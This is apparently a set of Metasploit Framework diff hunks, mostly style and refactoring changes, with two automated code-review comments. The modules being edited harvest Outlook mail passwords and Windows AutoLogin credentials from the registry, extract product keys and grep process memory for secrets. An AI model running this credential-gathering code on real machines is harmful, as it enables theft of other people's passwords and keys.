displayname = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Display Name')
email = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'Email')
pop3_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Server')
smtp_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Server')
http_server_url = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Server URL')
imap_server = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Server')
smtp_use_auth = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use Auth')
accountname = get_valdata(k, 'Account Name')
displayname = get_valdata(k, 'Display Name')
email = get_valdata(k, 'Email')
pop3_server = get_valdata(k, 'POP3 Server')
smtp_server = get_valdata(k, 'SMTP Server')
http_server_url = get_valdata(k, 'HTTP Server URL')
imap_server = get_valdata(k, 'IMAP Server')
smtp_use_auth = get_valdata(k, 'SMTP Use Auth')
if smtp_use_auth != nil
smtp_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP User')
smtp_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Password')
smtp_user = get_valdata(k, 'SMTP User')
smtp_password = get_valdata(k, 'SMTP Password')
end
if pop3_server != nil
@@ -136,10 +142,10 @@ class Metasploit3 < Msf::Post
print_status(" User E-mail Address: #{email}")
if type == "POP3"
pop3_pw = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Password')
pop3_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 User')
pop3_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SPA')
smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
pop3_pw = get_valdata(k, 'POP3 Password')
pop3_user = get_valdata(k, 'POP3 User')
pop3_use_spa = get_valdata(k, 'POP3 Use SPA')
smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{pop3_user}")
if pop3_pw == nil
@@ -160,14 +166,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (POP3): #{pop3_server}")
pop3_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Use SSL')
pop3_use_ssl = get_valdata(k, 'POP3 Use SSL')
if pop3_use_ssl == nil
print_status(" POP3 Use SSL: No")
else
print_status(" POP3 Use SSL: Yes")
end
pop3_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'POP3 Port')
pop3_port = get_valdata(k, 'POP3 Port')
if pop3_port == nil
print_status(" POP3 Port: 110")
portnum = 110
@@ -186,7 +192,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
@@ -201,9 +207,9 @@ class Metasploit3 < Msf::Post
end
elsif type == "HTTP"
http_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Password')
http_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP User')
http_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'HTTP Use SPA')
http_password = get_valdata(k, 'HTTP Password')
http_user = get_valdata(k, 'HTTP User')
http_use_spa = get_valdata(k, 'HTTP Use SPA')
print_status(" User Name: #{http_user}")
if http_password == nil
@@ -232,10 +238,10 @@ class Metasploit3 < Msf::Post
print_status(" HTTP Server URL: #{http_server_url}")
elsif type == "IMAP"
imap_user = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP User')
imap_use_spa = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SPA')
imap_password = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Password')
smtp_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Port')
imap_user = get_valdata(k, 'IMAP User')
imap_use_spa = get_valdata(k, 'IMAP Use SPA')
imap_password = get_valdata(k, 'IMAP Password')
smtp_port = get_valdata(k, 'SMTP Port')
print_status(" User Name: #{imap_user}")
if imap_password == nil
@@ -255,14 +261,14 @@ class Metasploit3 < Msf::Post
print_status(" Incoming Mail Server (IMAP): #{imap_server}")
imap_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Use SSL')
imap_use_ssl = get_valdata(k, 'IMAP Use SSL')
if imap_use_ssl == nil
print_status(" IMAP Use SSL: No")
else
print_status(" IMAP Use SSL: Yes")
end
imap_port = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'IMAP Port')
imap_port = get_valdata(k, 'IMAP Port')
if imap_port == nil
print_status(" IMAP Port: 143")
portnum = 143
@@ -281,7 +287,7 @@ class Metasploit3 < Msf::Post
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
end
smtp_use_ssl = registry_getvaldata("HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\#{k}", 'SMTP Use SSL')
smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')
if smtp_use_ssl == nil
print_status(" SMTP Use SSL: No")
else
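Review bot: In the first hunk (`@@ -82,21 +82,27 @@`) the new `registry_enumkeys(key_base + "9375CFF0413111d3B88A00104B2A6676\\")` inside `get_registry` refers to `key_base`, but the only `key_base` on the page is a local variable inside `get_valdata`, so unless `get_registry` defines its own outside the hunk this raises NameError on every run. Even with the same value the expression would be wrong, since `get_valdata`'s `key_base` already ends in that profile GUID and the concatenation would append it a second time. Hoisting the path into a small method that both callers use removes both problems, and the `get_valdata("", 'NextAccountID')` form still yields the trailing-backslash key the removed line used. The remainder of `get_registry` runs outside the hunk.
```ruby
  # Root of the Outlook profile keys; a method rather than a local so that
  # get_valdata and get_registry share one definition of the path.
  def outlook_key_base
    "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  end

  # Just a wrapper to avoid copy pasta and long lines
  def get_valdata(k, name)
    registry_getvaldata("#{outlook_key_base}\\#{k}", name)
  end

  def get_registry
    # … unchanged: outlook_exists / saved_accounts / NextAccountID lookup …
      registry_enumkeys("#{outlook_key_base}\\").each do |k|
    # … unchanged: per-account parsing …
```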
+14 -14
@@ -86,20 +86,20 @@ class Metasploit3 < Msf::Post
def run
'''
Hash format
:name,
:check_file,
:check_reg,
:pass_variable,
:port_variable,
:port,
:hash,
:pass,
:viewonly_variable,
:viewonly_hash,
:viewonly_pass
'''
'''
Hash format
:name,
:check_file,
:check_reg,
:pass_variable,
:port_variable,
:port,
:hash,
:pass,
:viewonly_variable,
:viewonly_hash,
:viewonly_pass
'''
locations = []
@@ -53,14 +53,13 @@ class Metasploit3 < Msf::Post
creds = Rex::Ui::Text::Table.new(
'Header' => 'Windows AutoLogin Password',
'Ident' => 1,
'Columns' =>
[
'Columns' => [
'Domain',
'UserName',
'Password'
]
)
has_al = 0
# DefaultDomainName, DefaultUserName, DefaultPassword
+2 -2
@@ -157,8 +157,8 @@ class Metasploit3 < Msf::Post
lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10)
@data_out += "\t\tVolume Name = #{lvt['name']}\n" +
"\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
"\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
"\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
"\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
end
+5 -5
@@ -46,11 +46,11 @@ class Metasploit3 < Msf::Post
#p = kern.GetCurrentProcess() #get handle to current process
pid = session.sys.process.open.pid
pr = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
pt = adv.OpenProcessToken(pr.handle, tok_all, 4) #get handle to primary token
it = adv.DuplicateToken(pt["TokenHandle"],2, 4) # get an impersonation token
if it["return"] #if it fails return 0 for error handling
return it["DuplicateTokenHandle"]
else
else
return 0
end
end
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Post
gen_map = [0,0,0,0]
gen_map = gen_map.pack("L")
#get Security Descriptor for the directory
#get Security Descriptor for the directory
f = adv.GetFileSecurityA(dir, si, 20, 20, 4)
f = adv.GetFileSecurityA(dir, si, f["lpnLengthNeeded"], f["lpnLengthNeeded"], 4)
sd = f["pSecurityDescriptor"]
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post
next if d =~ /^(\.|\.\.)$/
realpath = dpath + '\\' + d
if session.fs.file.stat(realpath).directory?
perm = check_dir(realpath, token)
perm = check_dir(realpath, token)
if !filter or perm.include? filter
print_status(perm + "\t" + realpath)
end
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Post
#get impersonation token
print_status("Getting impersonation token...")
t = get_imperstoken()
#loop through sub dirs if we have an impers token..else error
if t == 0
print_error("Getting impersonation token failed")
@@ -41,23 +41,24 @@ class Metasploit3 < Msf::Post
"License Key"
])
keys = [["HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId"],
["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654"],
["HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574"],
["HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId"],
]
keys = [
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0051-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0053-0000-0000-0000000FF1CE}", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\100\\Tools\\Setup", "DigitalProductId" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77654" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\90\\ProductID", "DigitalProductId77574" ],
[ "HKLM\\SOFTWARE\\Microsoft\\Exchange\\Setup", "DigitalProductId" ],
]
keys.each do |keyx86|
#parent key
p = keyx86[0,1].join
#child key
c = keyx86[1,1].join
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Post
(string_length-1).downto(0) do |s|
t = ((mindex << 8) & 0xffffffff) | product_id[s]
product_id[s] = t / 24
product_id[s] = t / 24
mindex = t % 24
end
+7 -8
@@ -17,20 +17,19 @@ class Metasploit3 < Msf::Post
super( update_info(info,
'Name' => 'Windows Gather Process Memory Grep',
'Description' => %q{
This module allows for searching the memory space of a proccess for potentially sensitive
data.
},
This module allows for searching the memory space of a proccess for potentially sensitive
data.
},
'License' => MSF_LICENSE,
'Author' => ['bannedit'],
'Version' => '$Revision$',
'Platform' => ['windows'],
'SessionTypes' => ['meterpreter' ]
))
register_options(
[
OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
], self.class)
register_options([
OptString.new('PROCESS', [true, 'Name of the process to dump memory from', nil]),
OptString.new('REGEX', [true, 'Regular expression to search for with in memory', nil]),
], self.class)
end
def run
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => "Windows Gather IP Range Reverse Lookup",
'Description' => %q{
'Description' => %q{
This module uses Railgun, calling the gethostbyaddr function to resolve a hostname
to an IP.
},
@@ -34,12 +34,12 @@ class Metasploit3 < Msf::Post
], self.class)
end
def run
#Add ws2_32 just in case it isn't there...
#Add ws2_32 just in case it isn't there...
session.railgun.ws2_32
#Check if gethostbyaddr is available to us
modhandle = session.railgun.kernel32.GetModuleHandleA('ws2_32.dll')
if modhandle['return'] == 0
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post
return
end
end
#Initialize Railgun 'gethostbyaddr' call'
session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [
['PCHAR', 'addr', 'in'],
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Post
iplist.each do |x|
#Converts an IP in string formate to network byte order format
nbi = Rex::Socket.addr_aton(x)
#Call gethostbyaddr
result = session.railgun.ws2_32.gethostbyaddr(nbi.to_s,nbi.size,2)
if result['return'] == 0
+4 -4
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Post
if isadmin
mace = registry_getkeylastwritetime('HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceClasses\\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\' << guid)
if mace
keytime = ::Time.at(mace)
else
keytime = "Unknown"
end
keytime = ::Time.at(mace)
else
keytime = "Unknown"
end
out << sprintf("%25s\t%50s\n", "Volume lpftLastWriteTime", keytime)
end
print_status(info_hash_to_str(out, v))
+2 -4
@@ -101,14 +101,12 @@ class Metasploit3 < Msf::Post
'Header' => "Active Routing Table",
'Prefix' => "\n",
'Postfix' => "\n",
'Columns' =>
[
'Columns' => [
'Subnet',
'Netmask',
'Gateway',
],
'ColProps' =>
{
'ColProps' => {
'Subnet' => { 'MaxWidth' => 17 },
'Netmask' => { 'MaxWidth' => 17 },
})
+4 -2
@@ -19,8 +19,10 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Local User Account Deletion',
'Description' => %q{ This module deletes a local user account from the specified server,
or the local machine if no server is given.},
'Description' => %q{
This module deletes a local user account from the specified server,
or the local machine if no server is given.
},
'License' => MSF_LICENSE,
'Author' => [ 'chao-mu'],
'Version' => '$Revision$',
+2 -2
@@ -57,8 +57,8 @@ class Plugin::CredCollect < Msf::Plugin
# Target infos for the db record
addr = session.sock.peerhost
# This ought to read from the exploit's datastore.
# Use the meterpreter script if you need to control it.
smb_port = 445
# Use the meterpreter script if you need to control it.
smb_port = 445
# Record hashes to the running db instance
hashes.each do |hash|
+4 -4
@@ -68,7 +68,7 @@ module SocketTracer
# Hook the write method
def write(buf, opts = {})
if (ips_match(buf))
$stderr.puts "*** Outbound write blocked due to possible signature match"
print_error "Outbound write blocked due to possible signature match"
return 0
end
super(buf, opts)
@@ -78,7 +78,7 @@ module SocketTracer
def read(length = nil, opts = {})
r = super(length, opts)
if (ips_match(r))
$stderr.puts "*** Incoming read may match a known signature"
print_error "Incoming read may match a known signature"
end
return r
end
@@ -95,11 +95,11 @@ module SocketTracer
begin
r = Regexp.new(s[1])
if (data.match(r))
$stderr.puts "*** Matched IPS signature #{s[0]}"
print_error "Matched IPS signature #{s[0]}"
return true
end
rescue ::Exception => e
$stderr.puts "*** Compiled error: #{s[1]}"
print_error "Compiled error: #{s[1]}"
end
end
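Review bot: The new `print_error "Compiled error: #{s[1]}"` in the third hunk (`@@ -95,11 +95,11 @@`) sits inside a `rescue ::Exception => e` that also swallows SignalException and SystemExit, and `e` is never used, so a malformed signature pattern is reported without the interpreter's reason. `Regexp.new` raises `RegexpError` for an invalid pattern; narrowing to `rescue ::RegexpError => e` and reporting it as `print_error "Compiled error: #{s[1]}: #{e.message}"` keeps the best-effort skip of bad signatures while leaving process signals alone. The enclosing method starts outside the hunk.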
+99 -98
@@ -1,5 +1,6 @@
##
## $Id$
# $Id$
# $Revision$
##
$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '..', 'lib', 'lab'))
@@ -14,7 +15,7 @@ class Plugin::Lab < Msf::Plugin
include Msf::Ui::Console::CommandDispatcher
attr_accessor :controller
def initialize(driver)
super(driver)
@controller = nil
@@ -28,12 +29,12 @@ class Plugin::Lab < Msf::Plugin
"lab_help" => "lab_help <lab command> - Show that command's description.",
"lab_show" => "lab_show - show all vms in the lab.",
"lab_show_running" => "lab_show_running - show running vms.",
"lab_load" => "lab_load [file] - load a lab definition from disk.",
"lab_load" => "lab_load [file] - load a lab definition from disk.",
"lab_save" => "lab_save [filename] - persist a lab definition in a file.",
"lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
"lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
"lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
"lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
"lab_load_dir" => "lab_load_dir [type] [directory] - create a lab from a specified directory.",
"lab_clear" => "lab_clear - clear the running lab.",
"lab_clear" => "lab_clear - clear the running lab.",
"lab_start" => "lab_start [vmid+|all] start the specified vm.",
"lab_reset" => "lab_reset [vmid+|all] reset the specified vm.",
"lab_suspend" => "lab_suspend [vmid+|all] suspend the specified vm.",
@@ -48,60 +49,60 @@ class Plugin::Lab < Msf::Plugin
def name
"Lab"
end
##
## Regular Lab Commands
##
##
def cmd_lab_load(*args)
return lab_usage unless args.count == 1
return lab_usage unless args.count == 1
@controller.from_file(args[0])
end
def cmd_lab_load_running(*args)
return lab_usage if args.empty?
if args[0] =~ /^remote_/
return lab_usage unless args.count == 3
return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_running(args[0], args[1], args[2])
else
return lab_usage unless args.count == 1
return lab_usage unless args.count == 1
@controller.build_from_running(args[0])
end
end
def cmd_lab_load_config(*args)
return lab_usage if args.empty?
if args[0] =~ /^remote_/
return lab_usage unless args.count == 3
return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_config(args[0], args[1], args[2])
else
return lab_usage unless args.count == 1
return lab_usage unless args.count == 1
@controller.build_from_config(args[0])
end
end
def cmd_lab_load_dir(*args)
def cmd_lab_load_dir(*args)
return lab_usage unless args.count == 2
@controller.build_from_dir(args[0],args[1],true)
end
def cmd_lab_clear(*args)
@controller.clear!
end
end
def cmd_lab_save(*args)
def cmd_lab_save(*args)
return lab_usage if args.empty?
@controller.to_file(args[0])
end
##
##
## Commands for dealing with a currently-loaded lab
##
##
def cmd_lab_show(*args)
if args.empty?
@@ -112,72 +113,72 @@ class Plugin::Lab < Msf::Plugin
print_line @controller[vmid].to_yaml
else
print_error "Unknown vm '#{vmid}'"
end
end
end
end
def cmd_lab_show_running(*args)
hlp_print_lab_running
end
def cmd_lab_start(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each do |vm|
print_line "Starting lab vm #{vm.vmid}."
if !vm.running?
vm.start
else
print_line "Lab vm #{vm.vmid} already running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
vm = @controller.find_by_vmid(arg)
if !vm.running?
print_line "Starting lab vm #{vm.vmid}."
vm.start
else
print_line "Lab vm #{vm.vmid} already running."
end
end
end
end
end
def cmd_lab_stop(*args)
def cmd_lab_show_running(*args)
hlp_print_lab_running
end
def cmd_lab_start(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each do |vm|
print_line "Stopping lab vm #{vm.vmid}."
if vm.running?
vm.stop
@controller.each do |vm|
print_line "Starting lab vm #{vm.vmid}."
if !vm.running?
vm.start
else
print_line "Lab vm #{vm.vmid} not running."
print_line "Lab vm #{vm.vmid} already running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
vm = @controller.find_by_vmid(arg)
if vm.running?
print_line "Stopping lab vm #{vm.vmid}."
vm.stop
vm = @controller.find_by_vmid(arg)
if !vm.running?
print_line "Starting lab vm #{vm.vmid}."
vm.start
else
print_line "Lab vm #{vm.vmid} not running."
print_line "Lab vm #{vm.vmid} already running."
end
end
end
end
end
end
end
def cmd_lab_stop(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each do |vm|
print_line "Stopping lab vm #{vm.vmid}."
if vm.running?
vm.stop
else
print_line "Lab vm #{vm.vmid} not running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
vm = @controller.find_by_vmid(arg)
if vm.running?
print_line "Stopping lab vm #{vm.vmid}."
vm.stop
else
print_line "Lab vm #{vm.vmid} not running."
end
end
end
end
end
def cmd_lab_suspend(*args)
return lab_usage if args.empty?
if args[0] == "all"
@controller.each{ |vm| vm.suspend }
else
@@ -186,15 +187,15 @@ class Plugin::Lab < Msf::Plugin
if @controller.find_by_vmid(arg).running?
print_line "Suspending lab vm #{arg}."
@controller.find_by_vmid(arg).suspend
end
end
end
end
end
end
end
end
def cmd_lab_reset(*args)
return lab_usage if args.empty?
if args[0] == "all"
print_line "Resetting all lab vms."
@controller.each{ |vm| vm.reset }
@@ -203,18 +204,18 @@ class Plugin::Lab < Msf::Plugin
if @controller.includes_vmid? arg
if @controller.find_by_vmid(arg).running?
print_line "Resetting lab vm #{arg}."
@controller.find_by_vmid(arg).reset
@controller.find_by_vmid(arg).reset
end
end
end
end
end
end
end
def cmd_lab_snapshot(*args)
return lab_usage if args.count < 2
snapshot = args[args.count-1]
snapshot = args[args.count-1]
if args[0] == "all"
print_line "Snapshotting all lab vms to snapshot: #{snapshot}."
@controller.each{ |vm| vm.create_snapshot(snapshot) }
@@ -225,12 +226,12 @@ class Plugin::Lab < Msf::Plugin
@controller[vmid_arg].create_snapshot(snapshot)
end
end
end
end
def cmd_lab_revert(*args)
return lab_usage if args.count < 2
snapshot = args[args.count-1]
snapshot = args[args.count-1]
if args[0] == "all"
print_line "Reverting all lab vms to snapshot: #{snapshot}."
@@ -239,10 +240,10 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
print_line "Reverting #{vmid_arg} to snapshot: #{snapshot}."
@controller[vmid_arg].revert_snapshot(snapshot)
@controller[vmid_arg].revert_snapshot(snapshot)
end
end
end
end
def cmd_lab_run_command(*args)
@@ -250,7 +251,7 @@ class Plugin::Lab < Msf::Plugin
command = args[args.count-1]
if args[0] == "all"
print_line "Running command #{command} on all vms."
@controller.each do |vm|
@controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} running command: #{command}."
vm.run_command(command)
@@ -260,19 +261,19 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
if @controller[vmid_arg].running?
print_line "#{vmid_arg} running command: #{command}."
print_line "#{vmid_arg} running command: #{command}."
@controller[vmid_arg].run_command(command)
end
end
end
end
end
def cmd_lab_browse_to(*args)
return lab_usage if args.empty?
uri = args[args.count-1]
if args[0] == "all"
print_line "Opening: #{uri} on all vms."
@controller.each do |vm|
@controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} opening to uri: #{uri}."
vm.open_uri(uri)
@@ -288,12 +289,12 @@ class Plugin::Lab < Msf::Plugin
end
end
end
##
## Commands for help
##
def longest_cmd_size
commands.keys.map {|x| x.size}.sort.last
end
@@ -332,9 +333,9 @@ class Plugin::Lab < Msf::Plugin
end
end
print_line
print_line
print_line "In order to use this plugin, you'll want to configure a .yml lab file"
print_line "You can find an example in data/lab/test_targets.yml"
print_line "You can find an example in data/lab/test_targets.yml"
print_line
end
@@ -349,18 +350,18 @@ class Plugin::Lab < Msf::Plugin
'Columns' => [ 'Vmid', 'Name', 'Location', "Power?" ]
)
@controller.each do |vm|
@controller.each do |vm|
tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
end
print_line tbl.to_s
end
def hlp_print_lab_running
indent = ' '
indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Running Lab VMs',
@@ -369,19 +370,19 @@ class Plugin::Lab < Msf::Plugin
)
@controller.each do |vm|
if vm.running?
tbl << [ vm.vmid,
if vm.running?
tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
end
end
end
print_line tbl.to_s
end
end
#
# The constructor is called when an instance of the plugin is created. The
# framework instance that the plugin is being associated with is passed in
@@ -427,6 +428,6 @@ class Plugin::Lab < Msf::Plugin
def desc
"Adds the ability to manage VMs"
end
end ## End Class
end ## End Module
+2 -2
@@ -104,13 +104,13 @@ class Plugin::Msfd < Msf::Plugin
addr = Rex::Socket.resolv_nbo(client.peerhost)
if opts['HostsAllowed'] and
not opts['HostsAllowed'].find { |x| x == addr }
not opts['HostsAllowed'].find { |x| x == addr }
client.close
next
end
if opts['HostsDenied'] and
opts['HostsDenied'].find { |x| x == addr }
opts['HostsDenied'].find { |x| x == addr }
client.close
next
end
+355 -364
@@ -1,16 +1,18 @@
# $Id$
# $Revision$
require 'nessus/nessus-xmlrpc'
require 'rex/parser/nessus_xml'
module Msf
#constants
NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf
Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits.
Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds
class Plugin::Nessus < Msf::Plugin
#creates the index of exploit details to make searching for exploits much faster.
def create_xindex
start = Time.now
@@ -19,50 +21,50 @@ module Msf
count = 0
# use Msf::Config.get_config_root as the location.
File.open("#{Xindex}", "w+") do |f|
#need to add version line.
f.puts(Msf::Framework::RepoRevision)
